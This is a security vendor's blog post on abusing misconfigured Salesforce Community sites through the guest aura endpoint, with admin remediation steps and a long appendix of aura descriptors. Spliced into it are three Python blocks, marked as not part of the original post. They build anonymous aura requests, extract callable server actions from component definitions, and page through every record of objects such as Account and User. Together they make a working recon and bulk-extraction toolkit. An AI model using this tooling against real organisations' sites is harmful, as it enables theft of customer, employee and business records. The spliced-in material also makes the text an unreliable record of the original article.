Abusing Misconfigured Salesforce Communities for Recon and Data Theft

Our research team has discovered numerous publicly accessible Salesforce Communities that are misconfigured and expose sensitive information.
Nitay Bachrach
Last updated August 20, 2024

Originally posted August 10, 2021.

Executive Summary

A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.

This is neither the first nor the last time a SaaS configuration will create a potential security incident, which underscores the need for security teams to continually assess their SaaS exposure.

This guide explains how an attacker can exploit the misconfiguration and gives Salesforce admins detailed steps to:

  1. Ensure your guest profile permissions don’t expose things you don’t want to be exposed (account records, employee calendars, etc.)
  2. Disable API access for your guest profile
  3. Set the default owner for records created by guest users
  4. Enable secure guest user access

Impact

At a minimum, a malicious actor could exploit this misconfiguration to perform recon for a spear-phishing campaign. At worst, they could steal sensitive information about the business, its operations, clients, and partners.

In some cases, a sophisticated attacker may be able to move laterally and retrieve information from other services that are integrated with a Salesforce account.

What are Salesforce Communities?

A Salesforce Community site lets your customers and partners interface with your Salesforce instance from outside your organization: they can open support tickets, ask questions, manage their subscriptions, and much more.

Communities are public-facing and, by default, indexed by Google. While this is useful for customers and partners, it makes it easy for attackers to discover public communities.

As you will see, Salesforce is highly customizable and can be difficult to administer. No two Salesforce instances are the same, with hundreds of third-party apps, custom objects, and configurations.

Technical Background

Salesforce communities run on Salesforce’s Lightning framework. Lightning is a rapid development framework for mobile and desktop sites.

Salesforce Lightning is a component-oriented framework. Those components, called aura components, are self-contained objects that a developer can assemble to create custom web pages.

Aura components can be used to perform actions on Salesforce objects—such as viewing or updating records. Components have controllers that export different methods to perform certain tasks.

Browsing a community site through an intercepting proxy, such as Burp Suite, shows us Lightning in action. The front-end web UI of a community uses the HTTP endpoint /s/sfsites/aura.

The browser uses the aura endpoint to retrieve information about the site and perform server-side actions as the user interacts with the community site. Naturally, the user’s permissions apply to these actions.

Browsing Salesforce with Burp Suite

Calling the aura endpoint is simply an HTTP request, either GET or POST, which consists of the following parameters:

  • pageURI – the path to the site, without the host. For example: “/s/”.
  • token – the current user’s token. The value of “undefined” indicates a guest user.
  • context – the current session’s context, provided by the site.
  • message – describes the desired action. It is possible to execute numerous methods in the same aura call. This structure contains a list of actions, which contain the method’s descriptor (a unique identifier of the method) and the call parameters.

The message structure is a URL-encoded JSON. Here is an example:


{
  "actions": [
    {
      "id": "222;a",
      "descriptor": "serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData",
      "callingDescriptor": "UNKNOWN",
      "params": {}
    }
  ]
}
  • id – a random string that can be used when sending more than one action in a single request. That way the browser can match actions and responses.
  • descriptor – the specific method to call.
  • callingDescriptor – Usually “UNKNOWN,” as this parameter is often ignored
  • params – Used to provide parameters to the method
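The request envelope described above, as an added example that is not part of the original post: a small Python helper that builds the message, form-encodes it the way the browser does, and pairs each returned action with the one that was sent. The form field names (message, aura.context, aura.token, aura.pageURI) are the wire names behind the four parameters listed above; the context values are placeholders that must be replaced with ones captured in the proxy, and the "while(1);" prefix handling is an assumption about the response body rather than something the article states.

```python
import itertools
import json
from urllib.parse import parse_qs, urlencode

AURA_ENDPOINT = "/s/sfsites/aura"

# Constructed stand-in for the context object the site hands the browser. The framework
# id (fwuid), app name and "loaded" map are site-specific and must be copied from a
# request captured in the proxy; the values below are placeholders, not real ones.
SAMPLE_CONTEXT = {
    "mode": "PROD",
    "fwuid": "REPLACE_WITH_CAPTURED_FWUID",
    "app": "siteforce:communityApp",
    "loaded": {"APPLICATION@markup://siteforce:communityApp": "REPLACE_WITH_CAPTURED_HASH"},
    "dn": [],
    "globals": {},
    "uad": False,
}

_action_ids = itertools.count(1)


def make_action(descriptor, params=None):
    """Build one entry of the message's "actions" list.

    The id only has to be unique within a request: the server echoes it back so the
    caller can pair each action with its result. The "N;a" shape mirrors what the
    browser sends.
    """
    return {
        "id": f"{next(_action_ids)};a",
        "descriptor": descriptor,
        "callingDescriptor": "UNKNOWN",  # ignored by most controllers
        "params": params or {},
    }


def build_form_body(actions, context, page_uri="/s/", token="undefined"):
    """Form-encode an aura call for POSTing to AURA_ENDPOINT.

    The article lists the parameters as pageURI, token, context and message; on the
    wire the browser sends them as the form fields below. token="undefined" is what a
    guest (unauthenticated) session sends.
    """
    message = {"actions": actions}
    return urlencode({
        "message": json.dumps(message, separators=(",", ":")),
        "aura.context": json.dumps(context, separators=(",", ":")),
        "aura.token": token,
        "aura.pageURI": page_uri,
    })


def decode_form_body(body):
    """Inverse of build_form_body: useful when reading a request captured in Burp."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    return {
        "message": json.loads(fields["message"]),
        "context": json.loads(fields["aura.context"]),
        "token": fields["aura.token"],
        "pageURI": fields["aura.pageURI"],
    }


def parse_response(text):
    """Parse a response body. Assumption: the body may start with a "while(1);"
    anti-hijacking prefix, which json.loads would reject, so strip it if present."""
    prefix = "while(1);"
    if text.startswith(prefix):
        text = text[len(prefix):]
    return json.loads(text)


def match_responses(actions, response):
    """Pair each action sent with its result by id, the way the browser does.

    Returns {descriptor: {"state": ..., "returnValue": ...}} so a caller can check
    SUCCESS/ERROR per method rather than per request.
    """
    by_id = {a["id"]: a for a in actions}
    results = {}
    for r in response.get("actions", []):
        sent = by_id.get(r.get("id"))
        if sent is None:
            continue
        results[sent["descriptor"]] = {
            "state": r.get("state"),
            "returnValue": r.get("returnValue"),
        }
    return results


if __name__ == "__main__":
    get_config = ("serviceComponent://ui.force.components.controllers.hostConfig."
                  "HostConfigController/ACTION$getConfigData")
    acts = [make_action(get_config)]
    print(f"POST {AURA_ENDPOINT}\n{build_form_body(acts, SAMPLE_CONTEXT)}")
```

Several actions can share one request; match_responses is what makes that practical, since a failing getObjectInfo on one object must not be mistaken for a failure of the whole batch.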

There are many different methods an unauthenticated user can execute to perform actions, such as:

  • Get information about the site
  • Get information about the Salesforce subscription
  • View default and custom objects and their fields
  • Retrieve data and records

Some of the objects you can query, if the guest user has been granted access to them, are Account, User, Case, Employee, Attachment, Contact, and Lead.

How can attackers exploit misconfigured communities?

On a misconfigured site, an attacker can perform recon by enumerating users, objects, and fields that expose names and email addresses, and in many cases can go further and read or steal the records themselves.

First, the attacker must find a community site to exploit. Some Google magic will do the trick. There are common URL “fingerprints” that will indicate a website is powered by Salesforce Communities:

  • /s/topic
  • /s/article
  • /s/contactsupport

Let me Google that for you

Using operators such as “inurl:” together with the name of the target, for example, one can often find the desired community site:

Google search with inurl parameter

The next step is to retrieve information about the site. The attacker can do that by calling the following method:


serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData

This method returns the domain of the organization, some security settings (e.g., allowed content security policy (CSP) domains), and available objects.

The attacker can call different methods to perform different actions such as:

  • Listing Salesforce objects
  • Listing records
  • Searching for records
  • Retrieving an object
  • Fetching information about the salesforce instance

Fetching sensitive data

Attackers can try to access sensitive data directly. Our security team has found troves of exposed sensitive records in our research.

The attacker can target specific objects and examine them by calling the method:


aura://RecordUiController/ACTION$getObjectInfo

This method returns information about an object. It supports all kinds of objects, including custom ones.

The information includes the different fields, how they are configured, and the child relationships of the object.

The next step would be listing the records using the method:


serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems

Here’s an example of listing Account records using this method:

The attacker can then fetch interesting records, with more fields and related objects, using methods such as:


serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord

or


aura://RecordUiController/ACTION$getRecordWithFields

Hunting for vulnerable third-party components

An advanced adversary might also attack vulnerable custom and third-party components.

When browsing the site, we can see that the browser loads several JavaScript files with unusual URLs that begin with /l/ followed by an encoded JSON object.

In these JavaScript files we can find the definitions of most of the accessible endpoints, including custom ones and third-party applications. The definitions are encoded as JSON:


{
  "descriptor": "compound://my_app.Component",
  "ac": [
    {
      "n": "doAction",
      "descriptor": "apex://my_app.ComponentController/ACTION$doAction",
      "at": "SERVER",
      "rt": "apex://String",
      "pa": [],
      "st": true
    }
  ],
  "pa": [
    {
      "name": "paramName",
      "type": "apex://String"
    }
  ]
}

By scanning the response for similarly formed JSON strings, one can learn about the custom methods and how to call them.
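A parser for these definitions, as an added example that is not part of the original post: it scans the definition text for "ac" arrays, keeps the server-side actions, and records the owning component, parameter names and return type so each can be turned into an aura action. The sample text, the my_app.* names and the client-side "init" entry are constructed for the example.

```python
import json
import re

# Constructed sample of the kind of minified definition text served from the /l/ URLs.
# The component and controller names (my_app.*) are hypothetical, and the surrounding
# JavaScript is a stand-in; only the definition objects matter to the parser.
SAMPLE_JS = (
    'var defs=[{"descriptor":"compound://my_app.Component",'
    '"ac":[{"n":"doAction","descriptor":"apex://my_app.ComponentController/ACTION$doAction",'
    '"at":"SERVER","rt":"apex://String","pa":[{"name":"paramName","type":"apex://String"}],"st":true},'
    '{"n":"init","descriptor":"js://my_app.Component/ACTION$init","at":"CLIENT","pa":[]}],'
    '"pa":[{"name":"recordId","type":"aura://String"}]},'
    '{"descriptor":"compound://my_app.Exporter",'
    '"ac":[{"n":"exportAll","descriptor":"apex://my_app.ExporterController/ACTION$exportAll",'
    '"at":"SERVER","rt":"apex://List","pa":[],"st":false}]}];'
)

AC_RE = re.compile(r'"ac"\s*:\s*\[')
DESCRIPTOR_RE = re.compile(r'"descriptor"\s*:\s*"([^"]+)"')


def _matching_bracket(text, start):
    """Index of the ']' closing the '[' at text[start]; bracket characters inside
    string literals are skipped so descriptors containing '$' or '/' do not confuse it."""
    depth = 0
    in_str = False
    i = start
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 1  # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c in "[{":
            depth += 1
        elif c in "]}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    raise ValueError("unbalanced brackets in definition text")


def extract_server_actions(js_text):
    """Return every server-side action ("at": "SERVER") declared in an "ac" array,
    with the owning component, its parameter names/types and its return type."""
    found = []
    for m in AC_RE.finditer(js_text):
        open_idx = m.end() - 1
        close_idx = _matching_bracket(js_text, open_idx)
        try:
            entries = json.loads(js_text[open_idx:close_idx + 1])
        except json.JSONDecodeError:
            continue  # not a clean JSON array; skip rather than guess
        # The owning component is the nearest preceding descriptor that is not itself
        # an action descriptor (those contain "/ACTION$").
        owners = [d for d in DESCRIPTOR_RE.findall(js_text[:m.start()]) if "/ACTION$" not in d]
        component = owners[-1] if owners else None
        for e in entries:
            if not isinstance(e, dict) or e.get("at") != "SERVER":
                continue
            found.append({
                "component": component,
                "name": e.get("n"),
                "descriptor": e.get("descriptor"),
                "params": [(p.get("name"), p.get("type")) for p in e.get("pa", [])],
                "returns": e.get("rt"),
            })
    return found


def action_skeleton(action):
    """Turn an extracted definition into the "actions" entry an aura message needs,
    with every declared parameter present and set to None for the caller to fill in."""
    return {
        "id": "1;a",
        "descriptor": action["descriptor"],
        "callingDescriptor": "UNKNOWN",
        "params": {name: None for name, _type in action["params"]},
    }


if __name__ == "__main__":
    for a in extract_server_actions(SAMPLE_JS):
        print(a["component"], "->", a["descriptor"], a["params"], "returns", a["returns"])
```

Run it over each /l/ response you saved from the proxy; custom apex:// descriptors that take no parameters, or only a record ID, are the ones worth calling first, since they need no prior knowledge of the site.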

What can you do about it?

Managing a community site is a tough job. It is important to make sure that anonymous guest users and community users can only access intended and required records. There is information you may want to share with the world, and other information you don’t.

To secure your Salesforce environment, it is very important to adhere to the principle of least privilege and ensure that guest profiles only allow the minimum required permissions.

Step 1 – Audit your guest profile permissions

Navigate to your Site Builder (search for “All Sites” in the setup) and click on Settings or the gear icon on the left.

You will find your guest user profile under General. Click on it to modify the guest user’s permissions.

Here you can control field-level security to control access at a very granular level. This is where you will need to make decisions about access that are specific to your business needs.

Step 2 – Disable API access

It’s important to ensure that API Enabled is unchecked on the guest profile. It’s recommended to disable Access Activities as well.

It is important to continuously monitor guest and community user permissions and sharing roles and to keep an eye on the records they own (and their related objects) to ensure sensitive information does not become publicly accessible.

Step 3 – Set a default owner for records created by guest users

Either go directly to your site’s workspaces, or use the site builder to navigate to the Administration workspace:

Under preferences, make sure that you set up a default owner for records created by guest users and, in most cases, you’ll want to turn off Let guest users see members of this site.

Step 4 – Enable secure guest user record access

Verify that the default access setting for guest users is secure: go to setup, and search for Sharing Settings. There look for the option Secure guest user record access and verify that it’s checked.

Salesforce is trying to help you make smart decisions about guest access. As of the Summer ’20 release, Salesforce has made it impossible to disable this setting. They also now prevent you from granting guest users the View All Users permission, and you can’t give them View All Data either.

It’s still of utmost importance, however, to review configuration settings. Salesforce cannot disable them all for you because different users have different requirements.

Wrapping up

As you can see, with SaaS applications as complex and customizable as Salesforce there are countless configuration settings and permissions to worry about.

Most organizations deploy dozens of sanctioned SaaS applications, each with its own objects, permissions models, APIs, and sharing features.

This is why we built DatAdvantage Cloud: to provide a unified way to find exposures, right-size privileges, and perform investigations across all your sanctioned SaaS applications.

Appendix: Aura descriptors and how to use them


serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData
  • No parameters

Gets the app data, including a list of objects which often includes custom objects, and the Salesforce login domain.


serviceComponent://ui.global.components.one.one.controller.OneController/ACTION$getCurrentApp
  • No parameters

Gets more information about the app including an extended list of objects


aura://RecordUiController/ACTION$getObjectInfo
  • ObjectApiName (String) – the name of the object

This function returns the definition of the object: its fields, its relationships, and configuration.


serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems
  • entityNameOrId (String) – the name of the object to list. For example: “Account” or “User”
  • pageSize (Int) – number of records to retrieve, up to 1000
  • currentPage (Int) – if there are more than pageSize records, use this to get the next pages
  • getCount (Boolean) – whether the total number of records should be retrieved
  • layoutType (String) – the layout; provide “FULL” to get more data
  • enableRowActions (Boolean) – true
  • useTimeout (Boolean) – false

Lists records of the specified objects.


serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord
  • recordDescriptor (String) – the record “descriptor”, in the following format:

{id}.undefined.null.null.null.Id.VIEW.false.null.{fields}.null
  • id – the ID of the record to retrieve; fields – a comma-separated list of fields to return, with every dot “.” in a field path replaced by “;2”. For example:

00500000000XxXXWXX.undefined.null.null.null.Id.VIEW.false.null.Name,CreatedBy;2Name.null
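As an added example covering the “Fetching sensitive data” section and this appendix (not code from the original post): Python builders for the getObjectInfo, getItems and getRecord actions, with descriptors and parameter names as the appendix gives them, plus the encoder and decoder for the recordDescriptor string. Each builder returns the descriptor/params pair that goes into an aura message’s “actions” list. Two things are assumptions rather than statements of the article: that currentPage starts at 1, and the 15/18-character check on record IDs, which is a general Salesforce property.

```python
# Descriptors as given in the article's appendix.
GET_OBJECT_INFO = "aura://RecordUiController/ACTION$getObjectInfo"
GET_ITEMS = ("serviceComponent://ui.force.components.controllers.lists."
             "selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems")
GET_RECORD = ("serviceComponent://ui.force.components.controllers."
              "recordGlobalValueProvider.RecordGvpController/ACTION$getRecord")

MAX_PAGE_SIZE = 1000  # upper bound for pageSize per the appendix


def object_info_action(object_api_name):
    """Describe an object (fields, relationships, configuration); works for custom objects too."""
    return {"descriptor": GET_OBJECT_INFO, "params": {"ObjectApiName": object_api_name}}


def list_items_action(entity, page=1, page_size=MAX_PAGE_SIZE):
    """One page of records of `entity`. Assumption: currentPage is 1-based; the appendix
    only says it selects the next pages when more than pageSize records exist."""
    if not 1 <= page_size <= MAX_PAGE_SIZE:
        raise ValueError(f"pageSize must be between 1 and {MAX_PAGE_SIZE}")
    if page < 1:
        raise ValueError("page must be >= 1")
    return {
        "descriptor": GET_ITEMS,
        "params": {
            "entityNameOrId": entity,
            "pageSize": page_size,
            "currentPage": page,
            "getCount": True,       # ask for the total so the caller knows how many pages exist
            "layoutType": "FULL",   # FULL returns more fields than the default layout
            "enableRowActions": True,
            "useTimeout": False,
        },
    }


def pages_needed(total_count, page_size=MAX_PAGE_SIZE):
    """Number of getItems calls needed to cover total_count records (at least one)."""
    return max(1, -(-total_count // page_size))


def list_all_actions(entity, total_count, page_size=MAX_PAGE_SIZE):
    """Actions for every page; total_count is what an earlier getCount=True call returned."""
    return [list_items_action(entity, p, page_size)
            for p in range(1, pages_needed(total_count, page_size) + 1)]


def record_descriptor(record_id, fields):
    """Build the getRecord "recordDescriptor" string:
        {id}.undefined.null.null.null.Id.VIEW.false.null.{fields}.null
    Field paths may traverse relationships (CreatedBy.Name); because "." separates the
    descriptor's own segments, every dot inside a field path is written as ";2"."""
    if len(record_id) not in (15, 18):
        raise ValueError("Salesforce record IDs are 15 or 18 characters")
    encoded = ",".join(f.replace(".", ";2") for f in fields)
    return f"{record_id}.undefined.null.null.null.Id.VIEW.false.null.{encoded}.null"


def parse_record_descriptor(descriptor):
    """Inverse of record_descriptor, for reading descriptors seen in captured traffic."""
    parts = descriptor.split(".")
    if len(parts) != 11:
        raise ValueError("unexpected descriptor shape")
    return parts[0], [f.replace(";2", ".") for f in parts[9].split(",")]


def record_action(record_id, fields):
    return {"descriptor": GET_RECORD,
            "params": {"recordDescriptor": record_descriptor(record_id, fields)}}


if __name__ == "__main__":
    # Typical recon order: describe the object, list a first page with a count,
    # then pull individual records with relationship fields.
    print(object_info_action("Account"))
    print(list_items_action("Account", page=1, page_size=50))
    print(record_action("00500000000XxXXWXX", ["Name", "CreatedBy.Name"]))
```

The same builders serve an admin auditing their own site: send getObjectInfo and a single-row getItems for each object you intend to keep private and treat any SUCCESS state on the guest session as an exposure to fix in the guest profile.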

Other undocumented endpoints

  • aura://ActionsController/ACTION$getActionLayout
  • aura://ActionsController/ACTION$getGlobalActions
  • aura://ActionsController/ACTION$getListViewActions
  • aura://ActionsController/ACTION$getLookupActions
  • aura://ActionsController/ACTION$getMRUListActions
  • aura://ActionsController/ACTION$getObjectCreateActions
  • aura://ActionsController/ACTION$getQuickActionDefaults
  • aura://ActionsController/ACTION$getRecordActions
  • aura://ActionsController/ACTION$getRecordEditActions
  • aura://ActionsController/ACTION$getRelatedListActions
  • aura://ActionsController/ACTION$getRelatedListRecordActions
  • aura://ActionsController/ACTION$getRelatedListsActions
  • aura://ApexActionController/ACTION$execute
  • aura://AppsController/ACTION$getNavItems
  • aura://CanvasController/ACTION$getCanvasData
  • aura://CommerceCatalogController/ACTION$getProduct
  • aura://CommerceCatalogController/ACTION$getProductCategoryPath
  • aura://CommerceImporterController/ACTION$importProducts
  • aura://CommerceSearchController/ACTION$searchProducts
  • aura://CommerceStorePricingController/ACTION$getProductPrice
  • aura://ComponentController/ACTION$getApplication
  • aura://ComponentController/ACTION$getApplicationDef
  • aura://ComponentController/ACTION$getComponent
  • aura://ComponentController/ACTION$getComponentDef
  • aura://ComponentController/ACTION$getComponents
  • aura://ComponentController/ACTION$getDefinitions
  • aura://ComponentController/ACTION$getEventDef
  • aura://ComponentController/ACTION$loadLabels
  • aura://ComponentController/ACTION$reportDeprecationUsages
  • aura://ComponentController/ACTION$reportFailedAction
  • aura://ComponentController/ACTION$reportUsages
  • aura://ConversationController/ACTION$getConversationCallStructureAndInsights
  • aura://DynamicComponentController/ACTION$getTemplateDescriptorWithExpansionBundle
  • aura://HostConfigController/ACTION$getConfigData
  • aura://LabelController/ACTION$getLabel
  • aura://LightningExperienceAssistantPlatformController/ACTION$getActiveQuestionnaires
  • aura://LightningExperienceAssistantPlatformController/ACTION$getActiveScenarios
  • aura://LightningExperienceAssistantPlatformController/ACTION$getAssistant
  • aura://LightningExperienceAssistantPlatformController/ACTION$getQuestionnaire
  • aura://LightningExperienceAssistantPlatformController/ACTION$saveAssistant
  • aura://LightningExperienceAssistantPlatformController/ACTION$saveQuestionnaire
  • aura://LinkedInSalesNavigatorController/ACTION$getSalesAccessToken
  • aura://LinkedInSalesNavigatorController/ACTION$getSignupUrl
  • aura://ListUiController/ACTION$getListInfoById
  • aura://ListUiController/ACTION$getListInfoByName
  • aura://ListUiController/ACTION$getListRecordsById
  • aura://ListUiController/ACTION$getListRecordsByName
  • aura://ListUiController/ACTION$getListUiById
  • aura://ListUiController/ACTION$getListUiByName
  • aura://ListUiController/ACTION$getListsByObjectName
  • aura://LookupController/ACTION$getLookupRecords
  • aura://ManagedContentController/ACTION$getManagedContentByTopicsAndContentKeys
  • aura://ManagedContentController/ACTION$getPublishedManagedContentListByContentKey
  • aura://MruListUiController/ACTION$getMruListInfo
  • aura://MruListUiController/ACTION$getMruListRecords
  • aura://MruListUiController/ACTION$getMruListUi
  • aura://NavEventManagerController/ACTION$getClassicNonSetupPageReferenceMappings
  • aura://NavEventManagerController/ACTION$getClassicSetupPageReferenceMappings
  • aura://NavEventManagerController/ACTION$getResolvedIntegrationUrl
  • aura://NavigationMenuController/ACTION$getCommunityNavigationMenu
  • aura://OrchestrationController/ACTION$getOrchestrationInstance
  • aura://OrchestrationController/ACTION$getOrchestrationInstanceCollection
  • aura://OrchestrationController/ACTION$publishOrchestrationEvent
  • aura://RecordMruController/ACTION$updateMru
  • aura://RecordUiController/ACTION$createRecord
  • aura://RecordUiController/ACTION$deleteRecord
  • aura://RecordUiController/ACTION$executeAggregateUi
  • aura://RecordUiController/ACTION$executeGraphQL
  • aura://RecordUiController/ACTION$findDuplicates
  • aura://RecordUiController/ACTION$getAggregateUi
  • aura://RecordUiController/ACTION$getDedupeConfig
  • aura://RecordUiController/ACTION$getDuplicateConfig
  • aura://RecordUiController/ACTION$getFormByName
  • aura://RecordUiController/ACTION$getLayout
  • aura://RecordUiController/ACTION$getLayoutUserState
  • aura://RecordUiController/ACTION$getObjectInfo
  • aura://RecordUiController/ACTION$getObjectInfos
  • aura://RecordUiController/ACTION$getPicklistValues
  • aura://RecordUiController/ACTION$getPicklistValuesByRecordType
  • aura://RecordUiController/ACTION$getRecordAvatars
  • aura://RecordUiController/ACTION$getRecordCloneDefaults
  • aura://RecordUiController/ACTION$getRecordCreateDefaults
  • aura://RecordUiController/ACTION$getRecordDefaultsTemplateClone
  • aura://RecordUiController/ACTION$getRecordDefaultsTemplateForCreate
  • aura://RecordUiController/ACTION$getRecordUis
  • aura://RecordUiController/ACTION$getRecordWithFields
  • aura://RecordUiController/ACTION$getRecordWithLayouts
  • aura://RecordUiController/ACTION$getRecordsWithFields
  • aura://RecordUiController/ACTION$getRecordsWithLayouts
  • aura://RecordUiController/ACTION$getValidationRulesInfo
  • aura://RecordUiController/ACTION$postRecordAvatarAssociation
  • aura://RecordUiController/ACTION$updateLayoutUserState
  • aura://RecordUiController/ACTION$updateRecord
  • aura://RelatedListUiController/ACTION$getRelatedListInfo
  • aura://RelatedListUiController/ACTION$getRelatedListInfoBatch
  • aura://RelatedListUiController/ACTION$getRelatedListInfoByApiName
  • aura://RelatedListUiController/ACTION$getRelatedListInfoCollection
  • aura://RelatedListUiController/ACTION$getRelatedListRecordCount
  • aura://RelatedListUiController/ACTION$getRelatedListRecords
  • aura://RelatedListUiController/ACTION$getRelatedListRecordsBatch
  • aura://RelatedListUiController/ACTION$getRelatedListsRecordCount
  • aura://RelatedListUiController/ACTION$updateRelatedListInfoByApiName
  • aura://SearchGridLWCController/ACTION$updateUserColumnWidthPref
  • aura://SeoPropertiesController/ACTION$getRecordSeoProperties
  • aura://SitesController/ACTION$searchSite
  • aura://StyleController/ACTION$applyTokens
  • aura://WaveController/ACTION$deleteDataset
  • aura://WaveController/ACTION$deleteRecipe
  • aura://WaveController/ACTION$executeQueryByInputRep
  • aura://WaveController/ACTION$getAnalyticsLimits
  • aura://WaveController/ACTION$getDataflowJob
  • aura://WaveController/ACTION$getDataflowJobNode
  • aura://WaveController/ACTION$getDataflowJobNodes
  • aura://WaveController/ACTION$getDataflowJobs
  • aura://WaveController/ACTION$getDataflowJobsByDataflowId
  • aura://WaveController/ACTION$getDataset
  • aura://WaveController/ACTION$getDatasets
  • aura://WaveController/ACTION$getRecipe
  • aura://WaveController/ACTION$getRecipes
  • aura://WaveController/ACTION$getReplicatedDatasets
  • aura://WaveController/ACTION$getSchedule
  • aura://WaveController/ACTION$getWaveFolders
  • aura://WaveController/ACTION$getXmd
  • aura://WaveController/ACTION$startDataflow
  • aura://WaveController/ACTION$updateDataflowJob
  • aura://WaveController/ACTION$updateSchedule
  • serviceComponent://ui.chatter.components.aura.components.forceChatter.groups.actions.EditGroupNotificationSettingsController/ACTION$getNotificationSettings
  • serviceComponent://ui.chatter.components.aura.components.forceChatter.groups.actions.EditGroupNotificationSettingsController/ACTION$setNotificationSettings
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$addParticipants
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$createMessage
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagesDetail
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagesListData
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMessagingPermAndPref
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getMoreReplies
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getRichTextConfig
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$getUserDetails
  • serviceComponent://ui.chatter.components.messages.MessagesController/ACTION$removeParticipants
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableAttributeLoaderController/ACTION$getComponentAttributes
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableComponentLoaderController/ACTION$getAudienceTargetedPageComponent
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.controller.PubliclyCacheableComponentLoaderController/ACTION$getPageComponent
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.network.tracking.NetworkTrackingController/ACTION$createLogRecord
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$getBootstrapCacheExpiration
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$getTopicDescription
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$isValidSObjectId
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$setCurrentApp
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.qb.QuarterbackController/ACTION$validateRoute
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getActionOverrides
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getArticleUrlNameAndVersionId
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getArticleVersionId
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCMSContentTypeAndURLName
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCMSContentTypeUrlnameAndId
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getCategoryPath
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getNameFieldValue
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$getPersonAccountIdFromContactId
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.recordservicecomponent.RecordServiceComponentController/ACTION$isAllowViewEditConvertedLeadsOn
  • serviceComponent://ui.comm.runtime.components.aura.components.siteforce.service.ServiceBodyController/ACTION$getTopicImageUrlFromContextId
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.baseSearch.BaseSearchController/ACTION$getCrossObjectDeflection
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getArticleDeflection
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getCombinedDeflection
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getCrossObjectDeflection
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.DeflectionDataProviderController/ACTION$getQuestionDeflection
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.LWCRecordDetailController/ACTION$getInitData
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopic
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopicFromEntityId
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.controller.OmniBoxController/ACTION$getTopicFromUrl
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.navigationMenu.NavigationMenuDataProviderController/ACTION$getNavigationMenu
  • serviceComponent://ui.communities.components.aura.components.forceCommunity.signalCollector.SignalCollectorController/ACTION$sendSignals
  • serviceComponent://ui.force.components.controllers.action.ActionController/ACTION$getServerSideComponent
  • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$findMatches
  • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$getConfig
  • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$loadObjectApiInfo
  • serviceComponent://ui.force.components.controllers.dedupe.DedupeManagerController/ACTION$loadRecords
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$cloneRecordWithRelatedEntities
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getDetailComponent
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getEntityConfig
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getNextRecordLayout
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getPostSaveNavigationEvent
